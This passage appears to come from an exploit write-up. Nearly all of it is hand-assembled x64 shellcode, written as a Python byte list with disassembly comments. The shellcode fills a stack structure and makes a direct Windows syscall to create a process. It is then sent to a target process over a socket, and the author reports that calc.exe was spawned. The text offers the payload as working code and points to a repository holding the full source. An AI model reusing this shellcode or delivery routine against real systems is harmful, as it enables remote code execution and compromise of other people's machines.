b'\x48\xc7\x83\xe8\x02\x00\x00\x00\x00\x00\x00', # 0x699: mov QWORD PTR [rbx+0x2e8],0x0
b'\x48\xc7\x83\xf0\x02\x00\x00\x00\x00\x00\x00', # 0x6a4: mov QWORD PTR [rbx+0x2f0],0x0
b'\x48\xc7\x83\xf8\x02\x00\x00\x00\x00\x00\x00', # 0x6af: mov QWORD PTR [rbx+0x2f8],0x0
b'\x48\xc7\x83\x00\x03\x00\x00\x00\x00\x00\x00', # 0x6ba: mov QWORD PTR [rbx+0x300],0x0
b'\x48\xc7\x83\x08\x03\x00\x00\x00\x00\x00\x00', # 0x6c5: mov QWORD PTR [rbx+0x308],0x0
b'\x48\xc7\x83\x10\x03\x00\x00\x00\x00\x00\x00', # 0x6d0: mov QWORD PTR [rbx+0x310],0x0
b'\x48\xc7\x83\x18\x03\x00\x00\x00\x00\x00\x00', # 0x6db: mov QWORD PTR [rbx+0x318],0x0
b'\x48\xc7\x83\x20\x03\x00\x00\x00\x00\x00\x00', # 0x6e6: mov QWORD PTR [rbx+0x320],0x0
b'\x48\xc7\x83\x28\x03\x00\x00\x00\x00\x00\x00', # 0x6f1: mov QWORD PTR [rbx+0x328],0x0
b'\x48\xc7\x83\x30\x03\x00\x00\x00\x00\x00\x00', # 0x6fc: mov QWORD PTR [rbx+0x330],0x0
b'\x48\xc7\x83\x38\x03\x00\x00\x00\x00\x00\x00', # 0x707: mov QWORD PTR [rbx+0x338],0x0
b'\x48\xc7\x83\x40\x03\x00\x00\x00\x00\x00\x00', # 0x712: mov QWORD PTR [rbx+0x340],0x0
b'\x48\xc7\x83\x48\x03\x00\x00\x00\x00\x00\x00', # 0x71d: mov QWORD PTR [rbx+0x348],0x0
b'\x48\xc7\x83\x50\x03\x00\x00\x00\x00\x00\x00', # 0x728: mov QWORD PTR [rbx+0x350],0x0
b'\x48\xc7\x83\x58\x03\x00\x00\x00\x00\x00\x00', # 0x733: mov QWORD PTR [rbx+0x358],0x0
b'\x48\xc7\x83\x60\x03\x00\x00\x00\x00\x00\x00', # 0x73e: mov QWORD PTR [rbx+0x360],0x0
b'\x48\xc7\x83\x68\x03\x00\x00\x00\x00\x00\x00', # 0x749: mov QWORD PTR [rbx+0x368],0x0
b'\x48\xc7\x83\x70\x03\x00\x00\x00\x00\x00\x00', # 0x754: mov QWORD PTR [rbx+0x370],0x0
b'\x48\xc7\x83\x78\x03\x00\x00\x00\x00\x00\x00', # 0x75f: mov QWORD PTR [rbx+0x378],0x0
b'\x48\xc7\x83\x80\x03\x00\x00\x00\x00\x00\x00', # 0x76a: mov QWORD PTR [rbx+0x380],0x0
b'\x48\xc7\x83\x88\x03\x00\x00\x00\x00\x00\x00', # 0x775: mov QWORD PTR [rbx+0x388],0x0
b'\x48\xc7\x83\x90\x03\x00\x00\x00\x00\x00\x00', # 0x780: mov QWORD PTR [rbx+0x390],0x0
b'\x48\xc7\x83\x98\x03\x00\x00\x00\x00\x00\x00', # 0x78b: mov QWORD PTR [rbx+0x398],0x0
b'\x48\xc7\x83\xa0\x03\x00\x00\x00\x00\x00\x00', # 0x796: mov QWORD PTR [rbx+0x3a0],0x0
b'\x48\xc7\x83\xa8\x03\x00\x00\x00\x00\x00\x00', # 0x7a1: mov QWORD PTR [rbx+0x3a8],0x0
b'\x48\xc7\x83\xb0\x03\x00\x00\x00\x00\x00\x00', # 0x7ac: mov QWORD PTR [rbx+0x3b0],0x0
b'\x48\xc7\x83\xb8\x03\x00\x00\x00\x00\x00\x00', # 0x7b7: mov QWORD PTR [rbx+0x3b8],0x0
b'\x48\xc7\x83\xc0\x03\x00\x00\x00\x00\x00\x00', # 0x7c2: mov QWORD PTR [rbx+0x3c0],0x0
b'\x48\xc7\x83\xc8\x03\x00\x00\x00\x00\x00\x00', # 0x7cd: mov QWORD PTR [rbx+0x3c8],0x0
b'\x48\xc7\x83\xd0\x03\x00\x00\x00\x00\x00\x00', # 0x7d8: mov QWORD PTR [rbx+0x3d0],0x0
b'\x48\xc7\x83\xd8\x03\x00\x00\x00\x00\x00\x00', # 0x7e3: mov QWORD PTR [rbx+0x3d8],0x0
b'\x48\xc7\x83\xe0\x03\x00\x00\x00\x00\x00\x00', # 0x7ee: mov QWORD PTR [rbx+0x3e0],0x0
b'\x48\xc7\x83\xe8\x03\x00\x00\x00\x00\x00\x00', # 0x7f9: mov QWORD PTR [rbx+0x3e8],0x0
b'\x48\xc7\x83\xf0\x03\x00\x00\x58\x0c\x00\x00', # 0x804: mov QWORD PTR [rbx+0x3f0],0xc58
b'\x48\xc7\x83\xf8\x03\x00\x00\x00\x00\x00\x00', # 0x80f: mov QWORD PTR [rbx+0x3f8],0x0
b'\x48\xc7\x83\x00\x04\x00\x00\x00\x00\x00\x00', # 0x81a: mov QWORD PTR [rbx+0x400],0x0
b'\x48\xc7\x83\x08\x04\x00\x00\x00\x00\x00\x00', # 0x825: mov QWORD PTR [rbx+0x408],0x0
b'\x4c\x8b\xbc\x24\x30\x31\x00\x00', # 0x830: mov r15,QWORD PTR [rsp+0x2130]
b'\x48\x81\xc4\x00\x20\x00\x00', # 0x838: add rsp,0x1000
b'\xc7\x84\x24\x20\x10\x00\x00\x30\x00\x00\x00', # 0x83f: mov DWORD PTR [rsp+0x1020],0x30
b'\x48\xc7\x84\x24\x50\x10\x00\x00\x58\x00\x00\x00', # 0x84a: mov QWORD PTR [rsp+0x1050],0x58
b'\xc6\x84\x24\x2a\x04\x00\x00\x01', # 0x856: mov BYTE PTR [rsp+0x42a],0x1
b'\x48\x89\x84\x24\x38\x11\x00\x00', # 0x85e: mov QWORD PTR [rsp+0x1138],rax
b'\x48\x8d\x84\x24\x00\x01\x00\x00', # 0x866: lea rax,[rsp+0x100]
b'\x48\x89\x84\x24\x38\x11\x00\x00', # 0x86e: mov QWORD PTR [rsp+0x1138],rax
b'\x48\x8b\xd8', # 0x876: mov rbx,rax
b'\x48\xc7\xc0\xa8\x00\x00\x00', # 0x879: mov rax,0xa8
b'\x48\x89\x03', # 0x880: mov QWORD PTR [rbx],rax
b'\x48\xc7\x43\x08\x03\x00\x01\x00', # 0x883: mov QWORD PTR [rbx+0x8],0x10003
b'\x48\xc7\x43\x10\x10\x00\x00\x00', # 0x88b: mov QWORD PTR [rbx+0x10],0x10
b'\x48\x8d\x84\x24\xa0\x10\x00\x00', # 0x893: lea rax,[rsp+0x10a0]
b'\x48\x89\x43\x18', # 0x89b: mov QWORD PTR [rbx+0x18],rax
b'\x48\xc7\x43\x20\x00\x00\x00\x00', # 0x89f: mov QWORD PTR [rbx+0x20],0x0
b'\x48\xc7\x43\x28\x06\x00\x00\x00', # 0x8a7: mov QWORD PTR [rbx+0x28],0x6
b'\x48\xc7\x43\x30\x40\x00\x00\x00', # 0x8af: mov QWORD PTR [rbx+0x30],0x40
b'\x48\x8d\x84\x24\xb0\x10\x00\x00', # 0x8b7: lea rax,[rsp+0x10b0]
b'\x48\x89\x43\x38', # 0x8bf: mov QWORD PTR [rbx+0x38],rax
b'\x48\xc7\x43\x40\x00\x00\x00\x00', # 0x8c3: mov QWORD PTR [rbx+0x40],0x0
b'\x48\xc7\x43\x48\x05\x00\x02\x00', # 0x8cb: mov QWORD PTR [rbx+0x48],0x20005
b'\x48\x0f\xb7\x84\x24\xc0\x0f\x00\x00', # 0x8d3: movzx rax,WORD PTR [rsp+0xfc0]
b'\x48\x89\x43\x50', # 0x8dc: mov QWORD PTR [rbx+0x50],rax
b'\x48\x8b\x84\x24\xc8\x0f\x00\x00', # 0x8e0: mov rax,QWORD PTR [rsp+0xfc8]
b'\x48\x89\x43\x58', # 0x8e8: mov QWORD PTR [rbx+0x58],rax
b'\x48\xc7\x43\x60\x00\x00\x00\x00', # 0x8ec: mov QWORD PTR [rbx+0x60],0x0
b'\x48\xc7\x43\x68\x0a\x00\x02\x00', # 0x8f4: mov QWORD PTR [rbx+0x68],0x2000a
b'\x48\xc7\x43\x70\x08\x00\x00\x00', # 0x8fc: mov QWORD PTR [rbx+0x70],0x8
b'\x48\x8d\x84\x24\x00\x11\x00\x00', # 0x904: lea rax,[rsp+0x1100]
b'\x48\x89\x43\x78', # 0x90c: mov QWORD PTR [rbx+0x78],rax
b'\x48\xc7\x83\x80\x00\x00\x00\x00\x00\x00\x00', # 0x910: mov QWORD PTR [rbx+0x80],0x0
b'\x48\x8d\x84\x24\x10\x11\x00\x00', # 0x91b: lea rax,[rsp+0x1110]
b'\x66\xc7\x00\x00\x10', # 0x923: mov WORD PTR [rax],0x1000
b'\x66\xc7\x40\x04\x00\x00', # 0x928: mov WORD PTR [rax+0x4],0x0
b'\x48\xc7\x83\x88\x00\x00\x00\x10\x00\x02\x00', # 0x92e: mov QWORD PTR [rbx+0x88],0x20010
b'\x48\xc7\x83\x90\x00\x00\x00\x08\x00\x00\x00', # 0x939: mov QWORD PTR [rbx+0x90],0x8
b'\x48\x8d\x84\x24\x10\x11\x00\x00', # 0x944: lea rax,[rsp+0x1110]
b'\x48\x89\x83\x98\x00\x00\x00', # 0x94c: mov QWORD PTR [rbx+0x98],rax
b'\x48\xc7\x83\xa0\x00\x00\x00\x00\x00\x00\x00', # 0x953: mov QWORD PTR [rbx+0xa0],0x0
b'\x48\x89\x83\x98\x00\x00\x00', # 0x95e: mov QWORD PTR [rbx+0x98],rax
b'\x48\xc7\x83\xa0\x00\x00\x00\x00\x00\x00\x00', # 0x965: mov QWORD PTR [rbx+0xa0],0x0
b'\x48\x8d\x8c\x24\x20\x11\x00\x00', # 0x970: lea rcx,[rsp+0x1120]
b'\x48\x8d\x94\x24\x28\x11\x00\x00', # 0x978: lea rdx,[rsp+0x1128]
b'\x41\xb8\x00\x00\x00\x02', # 0x980: mov r8d,0x2000000
b'\x41\xb9\x00\x00\x00\x02', # 0x986: mov r9d,0x2000000
b'\x48\x8d\x84\x24\x20\x10\x00\x00', # 0x98c: lea rax,[rsp+0x1020]
b'\x48\x89\x44\x24\x20', # 0x994: mov QWORD PTR [rsp+0x20],rax
b'\x48\x8d\x84\x24\x20\x10\x00\x00', # 0x999: lea rax,[rsp+0x1020]
b'\x48\x89\x44\x24\x28', # 0x9a1: mov QWORD PTR [rsp+0x28],rax
b'\xc7\x44\x24\x30\x00\x00\x00\x00', # 0x9a6: mov DWORD PTR [rsp+0x30],0x0
b'\xc7\x44\x24\x38\x00\x00\x00\x00', # 0x9ae: mov DWORD PTR [rsp+0x38],0x0
b'\x49\x8b\xc7', # 0x9b6: mov rax,r15
b'\x4c\x89\x7c\x24\x40', # 0x9b9: mov QWORD PTR [rsp+0x40],r15
b'\x48\x8d\x84\x24\x50\x10\x00\x00', # 0x9be: lea rax,[rsp+0x1050]
b'\x48\x89\x44\x24\x48', # 0x9c6: mov QWORD PTR [rsp+0x48],rax
b'\x48\x8b\x84\x24\x38\x11\x00\x00', # 0x9cb: mov rax,QWORD PTR [rsp+0x1138]
b'\x48\x89\x44\x24\x50', # 0x9d3: mov QWORD PTR [rsp+0x50],rax
b'\x4c\x8b\xd1', # 0x9d8: mov r10,rcx
b'\xb8\xd1\x00\x00\x00', # 0x9db: mov eax,0xd1
b'\x41\x56', # 0x9e0: push r14
b'\x0f\x05', # 0x9e2: syscall
b'\x41\x5e', # 0x9e4: pop r14
b'\x00\x00', # 0x9e6: add BYTE PTR [rax],al
b'\x00\x00', # 0x9e8: add BYTE PTR [rax],al
b'\x00\x00', # 0x9ea: add BYTE PTR [rax],al
b'\x00\x00', # 0x9ec: add BYTE PTR [rax],al
b'\x00\x00', # 0x9ee: add BYTE PTR [rax],al
b'\x00\x00', # 0x9f0: add BYTE PTR [rax],al
b'\x00\x00', # 0x9f2: add BYTE PTR [rax],al
b'\x00\x00', # 0x9f4: add BYTE PTR [rax],al
b'\x00\x00', # 0x9f6: add BYTE PTR [rax],al
b'\x00\x00', # 0x9f8: add BYTE PTR [rax],al
b'\x00\x00', # 0x9fa: add BYTE PTR [rax],al
b'\x00\x00', # 0x9fc: add BYTE PTR [rax],al
b'\x00\x00', # 0x9fe: add BYTE PTR [rax],al
]
send_seq_same_socket(seq)
I removed first line of assembly instruction because of the target process’s stack is already aligned.
Result
calc.exe spawned.
That error seen on the process’s terminal is because of the last null bytes. After syscall executed, nothing is important you can remove other bytes.
Binary/Source
Here is the github for all codes-> link
~ “Inspiration Exists, But It Has to Find You Working” ―Picasso
